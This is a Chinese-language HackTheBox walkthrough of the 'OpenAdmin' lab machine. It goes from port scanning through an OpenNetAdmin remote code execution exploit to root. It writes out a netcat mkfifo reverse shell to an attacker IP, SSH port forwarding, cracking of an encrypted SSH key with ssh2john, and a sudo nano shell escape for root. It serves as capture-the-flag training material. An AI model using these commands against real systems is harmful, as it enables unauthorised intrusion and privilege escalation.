hackthebox - openadmin （考点：ona安全 & 信息搜集 & 端口转发 & ssh2john & nano提权 ）

1 扫描

22想到可能会有ssh登录，80进web搜集信息

C:\root> masscan -p1-65535,U:1-65535 10.10.10.171 --rate=1000 -e tun0

Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-05-22 00:36:25 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.10.171                                    
Discovered open port 22/tcp on 10.10.10.171                                    

2 web信息搜集 & ona rce拿 www-data

进去是服务器配置默认页面，dirbuster扫到ona，进去看看

版本都说的很明显了。显然这应该是个可以突破的点。
网上搜到sh脚本https://www.exploit-db.com/exploits/47691
但是done那里报错，网上搜解决方法

不报错了，但是执行不了，或者说我没搞明白怎么才能远程执行。。。

换github上搜，https://github.com/amriunix/ona-rce这个，就简单方便多了
执行

python3 ona-rce.py exploit http://10.10.10.171/ona

拿到shell，但是我不习惯这个界面，我再转发弹shell到我本机另一端口
输入

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.43 443 >/tmp/f

开监听，收到，tty ： python3 -c 'import pty; pty.spawn("/bin/bash")'

3 提权至jimmy

linpeas 脚本扫描。
检测了下，没安装gcc，无法版本提权。只能信息搜集了。
可以在home里看到俩用户jimmy和乔安娜。
按照以前做靶机的经验，就要考虑可能得先拿到一个用户的shell，再拿另一个的，最后拿root，循序渐进。
这样做挺麻烦的，但如果没有其他关键信息，那可能就是这个思路了。

扫到内部不对外的两个端口，3306是一般是mysql，另外一个不知道。
这里可能涉及到端口转发，但我们目前没有ssh密码。还无法进行。所以留着心，后面可能要用到。

但是3306的mysql说明可能还会有数据库登录信息，可能就是ssh登录密码之类的。所以往这个方向找。

重要目录还扫到了/opt/ona,继续在这里面搜集信息。

最后在local里面找到了，这个也是个难点，一般登录信息都放在config里。所以一开始我就在www下的config里找，不容易想到在www下的local里。
一个个目录里翻也有些麻烦和考验人。可能觉得不会在那里，就不去看了。因此错过。

su切换成安娜或jimmy。后者成功。

这样我们也有密码了，可以试试端口转发，看看那个52846运行着啥

ssh -L 52846:127.0.0.1:52846 jimmy@10.10.10.171

然后本机浏览器127.0.0.1:52846查看，是个登录框，
但是这个密码无效。
留着，后面可能用的到。

4 提权成joanna

继续拿linpeas扫，看以jimmy角度是否有新东西能扫出来。

发现这个重要目录，进去信息搜集。

在index.php里看到jimmy这个hash。拿去解密

成功拿到新密码。

再向之前端口转发的52846那个登录框试试这个密码，搞定。
看到加了密的id_rsa, 昨天做的两台靶机刚好都有这个考点postman
拿去ssh2john解码，再拿john解就ok了

这应该就是joanna的ssh
再利用这个登录ssh。提示不够隐私的错误，要先chmod 600 id_rsa，再登录ssh -i id_rsa [email protected]，输入ssh的密码。
成功。

5 提权root

继续拿linpeas扫，发现sudo -l可以以root运行nano那个，这应该就是突破口

一开始我还以为是root以cronjob方式执行priv这个脚本，然后我往里面加弹shell代码，但是等了会没反应。。

接着尝试从nano下手。
还是和昨天做的靶机Traverxecr那台一样，在这个提权神奇网站搜nano 这里

按照提示来，sudo -u root /bin/nano /opt/priv

进入编辑界面，先按ctrl+r，然后底下会有提示ctrl+x是执行命令，接着输入ctrl+x
最后在命令行输入reset; sh 1>&0 2>&0

成功拿下root